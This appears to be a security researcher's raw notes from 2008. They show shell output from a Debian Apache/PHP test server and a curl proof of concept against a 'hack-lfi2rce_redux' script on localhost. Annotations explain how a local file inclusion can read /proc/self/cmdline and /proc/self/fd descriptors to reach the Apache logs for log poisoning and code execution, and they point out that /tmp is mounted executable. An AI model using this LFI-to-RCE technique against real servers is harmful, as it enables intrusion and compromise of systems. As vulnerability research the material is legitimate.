# ps aux | grep apache root 14144 0.0 0.6 29016 13280 ? Ss 13:03 0:00 /usr/sbin/apache2 -k start www-data 14149 0.0 0.3 29148 6464 ? S 13:03 0:00 /usr/sbin/apache2 -k start www-data 14150 0.0 0.2 29148 6144 ? S 13:03 0:00 /usr/sbin/apache2 -k start www-data 14151 0.0 0.3 29436 7964 ? S 13:03 0:00 /usr/sbin/apache2 -k start www-data 14152 0.0 0.2 29016 6064 ? S 13:03 0:00 /usr/sbin/apache2 -k start www-data 14153 0.0 0.3 29400 7908 ? S 13:03 0:00 /usr/sbin/apache2 -k start www-data 14154 0.0 0.2 29016 6060 ? S 13:04 0:00 /usr/sbin/apache2 -k start www-data 14156 0.0 0.3 29392 7792 ? S 13:04 0:00 /usr/sbin/apache2 -k start www-data 14158 0.0 0.3 29392 7792 ? S 13:04 0:00 /usr/sbin/apache2 -k start www-data 14159 0.0 0.3 29392 7792 ? S 13:04 0:00 /usr/sbin/apache2 -k start www-data 14160 0.0 0.2 29016 5000 ? S 13:04 0:00 /usr/sbin/apache2 -k start root 14170 0.0 0.0 3120 1316 pts/1 S+ 13:06 0:00 grep apache /proc/$i/environ PATH=/usr/local/bin:/usr/bin:/bin PWD=/root LANG=C SHLVL=1 _=/usr/sbin/apache2 (the entries in /proc/PID/environ are NUL-separated, so `cat` runs them together — "LANG=C" and "SHLVL=1" were fused above; use `tr '\0' '\n' </proc/$i/environ` to print one variable per line) /proc/14160/maps and smaps 00000000-00000000 r-xp 00000000 fd:01 231245 /usr/lib/libexslt.so.0.8.13 00000000-00000000 r-xp 00000000 fd:01 270356 /usr/lib/php5/20060613+lfs/pdo.so 00000000-00000000 r-xp 00000000 fd:01 270353 /usr/lib/php5/20060613+lfs/mysqli.so 00000000-00000000 r-xp 00000000 fd:01 112565 /usr/lib/libmysqlclient.so.15.0.0 00000000-00000000 r-xp 00000000 fd:01 270367 /usr/lib/php5/20060613+lfs/xsl.so 00000000-00000000 r-xp 00000000 fd:01 270352 /usr/lib/php5/20060613+lfs/pdo_mysql.so 00000000-00000000 r-xp 00000000 fd:01 109648 /usr/lib/libmcrypt.so.4.4.7 00000000-00000000 r-xp 00000000 fd:01 270351 /usr/lib/php5/20060613+lfs/mysql.so /proc/14160/mounts and mountstats rootfs / rootfs rw 0 0 none /sys sysfs rw 0 0 none /proc proc rw 0 0 udev /dev tmpfs rw 0 0 /dev/mapper/visa-root / ext3 rw,errors=remount-ro,data=ordered 0 0 /dev/mapper/visa-root /dev/.static/dev ext3 rw,errors=remount-ro,data=ordered 0 0 tmpfs /lib/init/rw tmpfs rw,nosuid 0 0 tmpfs /dev/shm 
tmpfs rw,nosuid,nodev 0 0 devpts /dev/pts devpts rw,nosuid,noexec 0 0 /dev/sda1 /boot ext3 rw,nosuid,noexec,data=ordered 0 0 /dev/mapper/visa-home /home ext3 rw,data=ordered 0 0 /dev/mapper/visa-home /var/log ext3 rw,data=ordered 0 0 /dev/mapper/visa-home /usr/src ext3 rw,data=ordered 0 0 /dev/mapper/visa-home /var/lib/mysql ext3 rw,data=ordered 0 0 /dev/mapper/visa-home /tmp ext3 rw,data=ordered 0 0 (note that /tmp is mounted rw with neither nosuid nor noexec, unlike /dev/shm and /boot above, so a file the www-data worker writes there can be executed directly; /var/log, /var/lib/mysql and /home also share that same volume) /proc/$i/stat statm 14160 (apache2) S 14144 14144 14144 0 -1 8512 232 0 0 0 0 0 0 0 20 0 1 0 7096675 29712384 1250 4294967295 1 1 0 0 0 0 0 536875008 134235755 0 0 0 17 1 0 0 0 0 0 status Name: apache2 State: S (sleeping) Tgid: 14160 Pid: 14160 PPid: 14144 TracerPid: 0 Uid: 33 33 33 33 Gid: 33 33 33 33 FDSize: 32 Groups: 33 VmPeak: 29020 kB VmSize: 29016 kB VmLck: 0 kB VmHWM: 5000 kB VmRSS: 5000 kB VmData: 3208 kB VmStk: 84 kB VmExe: 308 kB VmLib: 23312 kB VmPTE: 56 kB CsBase: 60000000 CsLim: 60000000 Threads: 1 SigQ: 0/4294967295 SigPnd: 0000000000000000 ShdPnd: 0000000000000000 SigBlk: 0000000000000000 SigIgn: 0000000020001000 SigCgt: 000000018800466b CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000 voluntary_ctxt_switches: 1 nonvoluntary_ctxt_switches: 0 PaX: peMRS 0 1 2 3 4 5 6 7 8 [Tue Jul 01 13:03:58 2008] [notice] ModSecurity for Apache 2.1.5 configured [Tue Jul 01 13:03:59 2008] [notice] Apache/2.2.3 (Debian) PHP/5.2.0-8+etch11 configured -- resuming normal operations visa:~# for i in `ps aux | grep apache | grep -v "grep" | sed "s/ */ /g" | cut -d " " -f 2`; do echo -e "$i\n";ls /proc/$i/fd;cat /proc/$i/fd/2; echo; done /proc/$i/fd/7 (the error log is reachable through more than one descriptor here — fd 2 above and fd 7 below both show Apache error-log entries — and the descriptor numbers depend on the order in which the worker opened its files, so an LFI probe of /proc/self/fd/N should enumerate N rather than assume a fixed number) [Tue Jun 03 15:38:10 2008] [error] [client 127.0.0.1] File does not exist: /home/www-data/http/favicon.ico [Tue Jun 03 15:38:13 2008] [error] [client 127.0.0.1] attempt to invoke directory as script: /home/www-data/cgi-bin/ [Tue Jun 03 15:49:26 2008] [error] [client 127.0.0.1] script not found or unable to stat: /home/www-data/cgi-bin/aaa [Tue Jun 03 15:50:19 2008] [error] [client 127.0.0.1] script not 
found or unable to stat: /home/www-data/cgi-bin/javascript alert 123 [Tue Jun 03 15:50:41 2008] [error] [client 127.0.0.1] script not found or unable to stat: /home/www-data/cgi-bin/javascript alert 123 127.0.0.1 - - [17/Apr/2008:17:40:50 -0700] "GET /minded/heads/research.jpg HTTP/1.1" 304 - "http://localhost:8173/minded/advisories.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080311 Iceweasel/2.0.0.13 (Debian-2.0.0.13-0etch1)" 127.0.0.1 - - [17/Apr/2008:17:40:50 -0700] "GET /minded/images/template_15.gif HTTP/1.1" 304 - "http://localhost:8173/minded/template.css" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080311 Iceweasel/2.0.0.13 (Debian-2.0.0.13-0etch1)" 127.0.0.1 - - [17/Apr/2008:17:40:50 -0700] "GET /minded/images/arrows.gif HTTP/1.1" 304 - "http://localhost:8173/minded/template.css" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080311 Iceweasel/2.0.0.13 (Debian-2.0.0.13-0etch1)" 127.0.0.1 - - [17/Apr/2008:17:40:50 -0700] "GET /minded/images/arrows_red.gif HTTP/1.1" 304 - "http://localhost:8173/minded/templa visa:~# for i in `ps aux | grep apache | grep -v "grep" | sed "s/ */ /g" | cut -d " " -f 2`; do echo -e "$i\n";ls /proc/$i/fd;cat /proc/$i/fd/8; echo; done 3128 /usr/sbin/lighttpd-f/etc/lighttpd/lighttpd.conf 3129 /usr/bin/php5-cgi 3130 3131 3132 3133 3134 3135 3136 /usr/bin/php5-cgi 3137 3138 3139 3140 /usr/bin/php4-cgi 3141 3142 3143 /usr/bin/php4-cgi 3223 /usr/bin/php4-cgi 3224 /usr/bin/php4-cgi 3225 /usr/bin/php4-cgi 3226 /usr/bin/php4-cgi 3227 /usr/bin/php4-cgi 3228 /usr/bin/php4-cgi 3229 /usr/bin/php4-cgi 3230 /usr/bin/php4-cgi 3261 /usr/bin/php5-cgi 3262 /usr/bin/php5-cgi 3263 /usr/bin/php5-cgi 3264 /usr/bin/php5-cgi 3265 /usr/bin/php5-cgi 3266 /usr/bin/php5-cgi 3267 /usr/bin/php5-cgi 3268 /usr/bin/php5-cgi --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- 
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ curl "http://localhost:8173/hack-lfi2rce_redux/poc.php?path=/proc/self/cmdline" -kis; echo HTTP/1.1 200 OK Date: Tue, 01 Jul 2008 20:04:57 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch11 X-Powered-By: PHP/5.2.0-8+etch11 Content-Length: 27 Content-Type: text/html; charset=UTF-8 /usr/sbin/apache2-kstart (the argv entries in /proc/self/cmdline are NUL-separated and the terminal does not render the NULs, which is why the three arguments run together; the Content-Length of 27 accounts for them: `/usr/sbin/apache2`, `-k`, `start` plus three NUL bytes, matching the ps output at the top. A 200 carrying the worker's own command line shows the include is resolved inside the Apache process itself, so the same LFI can read /proc/self/fd/N — the descriptors dumped above carry the error and access logs — without knowing the on-disk log paths, which is the step that makes log poisoning reachable.) --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--